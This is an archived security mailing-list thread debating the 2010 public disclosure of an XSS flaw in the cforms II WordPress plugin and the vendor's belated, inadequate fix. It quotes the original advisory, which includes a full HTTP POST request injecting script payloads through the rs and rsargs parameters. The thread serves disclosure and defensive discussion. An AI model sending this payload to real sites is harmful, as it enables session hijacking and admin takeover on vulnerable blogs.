Re: Fwd: 0-DAY XSS of cforms II is now fixed after a year and four months (was Re: cforms WordPress Plugin Cross Site Scripting Vulnerability - CVE-2010-3977)

["Rodrigo Rubira Branco \(BSDaemon\)" <rodrigo () kernelhacking com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dear Kousuke,

First of all, let me clarify that the disclosure process has been
entirely coordinated by me, and thus, Wagner, Conviso and Check Point
have no responsibilities over any mistake I eventually made.

Anyway, just to clarify your points:

> First, you must have reported to the developer, but in what way?

I sent to the developer a complete advisory, including the exploit code.

> Confusing the XSS vulnerability with PHP code execution
> vulnerability is so funny. I can't help feeling that you told it
> sloppily.

I never confused the vulnerabilities.   And I never said the bug was
patched... Maybe you should redirect this comment to Secunia instead?

> Second, why didn't you confirm the fix before publishing exploit?

I don't have any obligation in confirming a fix.   Actually, the
developer reply was:
  "No one else ever complained about this problem and we have millions
of users, so we are not fixing it"

Thus, I didn't even knew there was a fix at any point in time.

Probably you, for not having any information of what actually happened
and because you totally mixed Secunia advisory with ours decided to
send such email blaming us.

> And I'd like to ask ALL SECURITY RESEARCHERS (of course including 
> Rodrigo and Wagner).
>
> For what do you research security? What is your "security"? To
> protect people from threat? Or throw people into crisis? Do you
> recognize effects of your halfway job like this case?

We have a responsibility with the users.   If the user is not aware
that a vulnerability exists and is ignored by the vendor, he will
never have the power to decide.

Informing and sharing information is the responsibility of the
researchers.   I always coordinated vulnerabilities I disclose, but in
case the developer decides that millions of users never reported and
thus, the issue is not really a problem, I just go ahead and publish
so the users can decide what to do.   This is an open-source project,
so any user that is security-aware could apply a patch themselves.


If you have further questions, I'm glad to help.



Best Regards,



Rodrigo.





On 2/17/12 3:37 AM, Wagner Elias wrote:
> FYI 
> --------------------------------------------------------------------------------
Wagner Elias, SANS GIAC, CobiTc, ITILc
> CTO (Chief Technical Officer) +55 41 3095-3986 +55 11 8141-3256 
> ------------ Blog: http://wagnerelias.com Twitter:
> http://www.twitter.com/welias Conviso Application Security -
> http://www.conviso.com.br
>
>
>
> ---------- Forwarded message ---------- From: *Kousuke Ebihara*
> <kousuke () co3k org <mailto:kousuke () co3k org>> Date: Fri, Feb 17,
> 2012 at 2:31 AM Subject: 0-DAY XSS of cforms II is now fixed after
> a year and four months (was Re: cforms WordPress Plugin Cross Site
> Scripting Vulnerability - CVE-2010-3977) To: Rodrigo Branco
> <rbranco () checkpoint com <mailto:rbranco () checkpoint com>> Cc:
> "full-disclosure () lists grok org uk 
> <mailto:full-disclosure () lists grok org uk>" 
> <full-disclosure () lists grok org uk 
> <mailto:full-disclosure () lists grok org uk>>,
> "bugtraq () securityfocus com <mailto:bugtraq () securityfocus com>"
> <bugtraq () securityfocus com <mailto:bugtraq () securityfocus com>>,
> "Wagner Elias (welias () conviso com br
> <mailto:welias () conviso com br>)" <welias () conviso com br
> <mailto:welias () conviso com br>>
>
>
> I've reported the following XSS vulnerability in cforms II. This 
> vulnerability has been fixed on February 14, 2012 by its
> developer.
>
> WordPress cformsII Plugin "rs" Cross-Site Scripting Vulnerability
> - Secunia.com http://secunia.com/advisories/47984/
>
> You might see this is a normal XSS vulnerability, but this isn't.
>
> Because EXPLOIT CODE IS PUBLISHED AS 0-DAY ON Oct 30, 2010 in this
> list!
>
> Are you puzzled?
>
> Actually, the above vulnerability is the same with CVE-2010-3977,
> is brought by Rodrigo Branco and Wagner Elias.
>
> Secunia has published the related advisory on Nov 1, 2010: 
> http://secunia.com/advisories/42006. According to Secunia, this 
> vulnerability is fixed in v11.6.1. v11.6.1 is released on Sep 22,
> 2010.
>
> So you might image the following story.
>
> 1. Rodrigo (or Wagner) reported this vulnerability to the
> developer 2. The developer released new version for fix the XSS 3.
> Rodrigo (and/or Wagner) confirmed that fix 4. Rodrigo reports this
> vulnerability to this list
>
> However, this is not truth. The developer of cforms didn't fix this
> XSS at this point.
>
> So what he has "fixed"? See the following diff::
>
> --- cforms-v11.5/lib_ajax.php       2009-09-18 10:29:06.000000000
> +0900 +++ cforms-v11.6.1/lib_ajax.php     2010-09-22
> 07:41:54.000000000 +0900 @@ -627,16 +627,16 @@ ###  always
> modified header ("Cache-Control: no-cache, must-revalidate");  ### 
> HTTP/1.1 header ("Pragma: no-cache");                          ### 
> HTTP/1.0 -                   $func_name = $_GET["rs"]; +
> $func_name = sajax_sanitize( $_GET["rs"] ); if (!
> empty($_GET["rsargs"])) -                           $args =
> $_GET["rsargs"]; +                           $args =
> sajax_sanitize( $_GET["rsargs"] ); else $args = array(); } else { -
> $func_name = $_POST["rs"]; +                   $func_name =
> sajax_sanitize( $_POST["rs"] ); if (! empty($_POST["rsargs"])) -
> $args = $_POST["rsargs"]; +                           $args =
> sajax_sanitize( $_POST["rsargs"] ); else $args = array(); } @@
> -651,6 +651,14 @@ exit; }
>
> +   ### sanitize +   function sajax_sanitize($t) { +           //$t
> = preg_replace('/\s/', '', $t); +           $t =
> str_replace('<php', '', $t); +           $t = str_replace('<?', '',
> $t); +           return $t; +   } + ###  javascript escape a value 
> function sajax_esc($val) {
>
> WTF!? This looks like fix for PHP code execution vulnerability,
> but there are no such vulnerabilities!
>
> Hey, Rodrigo and Wagner, do YOU see the above as fix for XSS?
> Really?
>
> So, the XSS was not fixed in v11.6.1. Of course the exploit code
> that was posted by Rodrigo, was available in many site until
> February 14, 2012.
>
> XSS vulnerability in WordPress and its plugin is too dangerous
> because if attacker gets full privileges of admin user by that
> vulnerability, he can write and execute any PHP code by using theme
> editing feature (if the target file is writable).
>
> As you can see, Rodrigo has done is throwing every cforms users
> into crisis and nothing more.
>
> Since exploit code is published before fix, there should be
> attacker who focuses this vulnerability. If so, many sites may be
> attacked by this vulnerability even if the admin never failed to
> apply security fix.
>
>
> Rodrigo and Wagner, I have some questions to you.
>
> First, you must have reported to the developer, but in what way? 
> Confusing the XSS vulnerability with PHP code execution
> vulnerability is so funny. I can't help feeling that you told it
> sloppily. Second, why didn't you confirm the fix before publishing
> exploit?
>
>
> And I'd like to ask ALL SECURITY RESEARCHERS (of course including 
> Rodrigo and Wagner).
>
> For what do you research security? What is your "security"? To
> protect people from threat? Or throw people into crisis? Do you
> recognize effects of your halfway job like this case?
>
> Please reconsider this.
>
>
> Thanks, Kousuke
>
> (10/10/31 0:13), Rodrigo Branco wrote:
> > Dear List,
> >
> > I'm writing on behalf of the Check Point Vulnerability Discovery
> > Team
> to publish the following vulnerability.
> > Check Point Software Technologies - Vulnerability Discovery Team
> > (VDT) http://www.checkpoint.com/defense/
> >
> > cforms WordPress Plugin Cross Site Scripting Vulnerability 
> > CVE-2010-3977
> >
> >
> > INTRODUCTION
> >
> > According to Delicious Days, "cforms is a powerful and feature
> > rich
> form plugin for WordPress, offering convenient deployment of
> multiple Ajax
> > driven contact forms throughout your blog or even on the same
> > page."
> >
> > This problem was confirmed in the following versions of the
> > cforms
> WordPress Plugin, other versions
> > maybe also affected.
> >
> > cforms v11.5
> >
> >
> > CVSS Scoring System
> >
> > The CVSS score is: 5.5 Base Score: 6.7 Temporal Score: 5.5 We
> > used the following values to calculate the scores: Base score is:
> > AV:N/AC:L/Au:N/C:C/I:C/A:N Temporal score is: E:F/RL:OF/RC:C
> >
> >
> > DETAILS
> >
> > A data array is created in lib_ajax.php using values from a form
> > field
> in a POST request.  The parameters rs and rsargs are not validated
> and thus
> > it is possible to inject code.
> >
> > Request: http://<server>/wp-content/plugins/cforms/lib_ajax.php 
> > POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1 Host:
> > <server> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X
> > 10.6; en-US; rv: 1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept:
> > text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
> > Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate 
> > Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 
> > Connection: keep-alive Content-Type:
> > application/x-www-form-urlencoded; charset=UTF-8 Content-Length:
> > 219 Cookie:
> > wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do
%26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce
> > %26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do
%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;
> > c o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f
> > 8 0
> 2 0 5 8 e 8 2 3 8 8 f 6 = t e s t  ;
> > comment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam
%40checkpoint.com <http://40checkpoint.com>
> > Pragma: no-cache Cache-Control: no-cache 
> > rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#
$<script>alert(1)</script>$#$rbranco_nospam () checkpoint com
> <mailto:rbranco_nospam () checkpoint com>$#$http://
> > www.checkpoint.com
> > <http://www.checkpoint.com>$#$<script>alert(1)</script>
> >
> >
> >
> > CREDITS
> >
> > This vulnerability has been brought to our attention by Wagner
> > Elias
> from Conviso IT Security company (http://www.conviso.com.br) and 
> researched internally by Rodrigo Rubira Branco from the Check
> Point Vulnerability Discovery Team (VDT).
> > Best Regards,
> >
> > Rodrigo.
> >
> > -- Rodrigo Rubira Branco Senior Security Researcher Vulnerability
> > Discovery Team (VDT) Check Point Software Technologies
>
>
> -- Kousuke Ebihara <kousuke () co3k org <mailto:kousuke () co3k org>> 
> http://co3k.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAk8+Ps8ACgkQRpuC3B/O3qEnkgCfYMaIGbYhBw0DtIbJP6Wcw1wl
mnsAnRJsPQm7jQlMgCx3PE1pNTYZtDYo
=3DaK
-----END PGP SIGNATURE-----